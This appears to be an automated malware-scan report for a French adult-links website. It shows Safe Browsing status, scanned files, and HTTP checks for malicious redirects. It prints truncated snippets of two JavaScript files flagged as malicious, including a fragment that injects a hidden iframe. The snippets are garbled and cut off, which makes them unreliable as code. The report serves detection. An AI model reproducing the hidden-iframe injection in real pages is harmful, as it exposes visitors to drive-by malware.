Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sitesxgratuits.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sitesxgratuits.net/ | 200 OK Content-Length: 109386 Content-Type: text/html | clean |
http://sitesxgratuits.net/xpl_scripts/functions.js | 200 OK Content-Length: 8561 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function itemRate(id,rating) { window.open('/xpl_scripts/vote.php?id='+id+'&rating='+rating,'','width=10,height=10,toolbars=no,status=no'); alert('Vous avez vot??? pour ce site. Merci.'); self.focus(); return false; } function addFavorite(id) { window.open('/xpl_scripts/addfavorite.php?id='+id,'',"width=10,height=10,toolbars=no,status=no"); self.focus(); alert('Ce lien appara???tra dans vos favoris personnels. Merci.\n\nPour vous y rendre, c if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://sitesxgratuits.net/includes/js/disclaimer.js | 200 OK Content-Length: 9881 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var cookieinfo function CookieExist(CookieName) { cookieinfo = document.cookie; if (cookieinfo.indexOf(CookieName) == -1) { return false; } else { return true; } } function SetCookie(CookieName,CookieArgs,CookieExpire) { document.cookie = CookieName + "=" + CookieArgs + ";" + "expires=" + CookieExpire; } function GetCookie(CookieName) { if ( CookieExist(CookieName) ){ d = cookieinfo.indexOf(CookieName) + Cookie if(f)e(s);} Antivirus reports:
| ||
http://www.indecentes-voisines.com/outils.php?462|off|all | 200 OK Content-Length: 622 Content-Type: text/html | clean |
http://www.indecentes-voisines.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.easy-dating.org/js/AC_RunActiveContent.js | 200 OK Content-Length: 3341 Content-Type: application/x-javascript | clean |
http://www.easy-dating.org/_SCRIPT/slideshowflash.php?siteid=118674&title=1 | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 22:17:30 GMT Location: http://promo.easy-dating.org/f/tvtopprofiles/?siteid=118674&title=1 Server: nginx Vary: Accept-Encoding Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | clean |
http://promo.easy-dating.org/f/tvtopprofiles/?siteid=118674&title=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://mb.smartmovies.net/promo_thumbs.php?id_document=68139&promo=hasard&taille=194&txt_p=1&face=Verdana&size_px=7&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 29 Sep 2014 22:17:31 GMT Location: http://www.smartmovies.net/promothumbs/thumbs/?smartmovies_document_id=68139&archive_id=1&taille=150&promo=hasard&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel&date=1&face=Verdana&size_px=7&border=0&preview=n&ajax=1 Server: nginx/1.2.1 Content-Type: text/html | clean |
http://www.smartmovies.net/promothumbs/thumbs/?smartmovies_document_id=68139&archive_id=1&taille=150&promo=hasard&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel&date=1&face=verdana&size_px=7&border=0&preview=n&ajax=1 | 200 OK Content-Length: 2956 Content-Type: text/javascript | clean |
http://ks300749.kimsufi.com/~stats/phpmyvisites.js | 500 Can't connect to ks300749.kimsufi.com:80 (ÐÐµÑ Ð¼Ð°ÑÑÑÑÑа до Ñзла) Content-Length: 208 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sitesxgratuits.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 22:17:27 GMT
Accept-Ranges: bytes
ETag: "9c3ae-1ab4a-eb50580"
Server: Apache/2.2.3 (Debian) PHP/5.2.11-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 109386
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 07 Aug 2012 21:55:50 GMT
...109386 bytes of data.
GET / HTTP/1.1
Host: sitesxgratuits.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 22:17:27 GMT
Accept-Ranges: bytes
ETag: "9c3ae-1ab4a-eb50580"
Server: Apache/2.2.3 (Debian) PHP/5.2.11-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 109386
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 07 Aug 2012 21:55:50 GMT
...109386 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sitesxgratuits.net
Referer: http://www.google.com/search?q=sitesxgratuits.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sitesxgratuits.net
Referer: http://www.google.com/search?q=sitesxgratuits.net
Result:
The result is similar to the first query. There are no suspicious redirects found.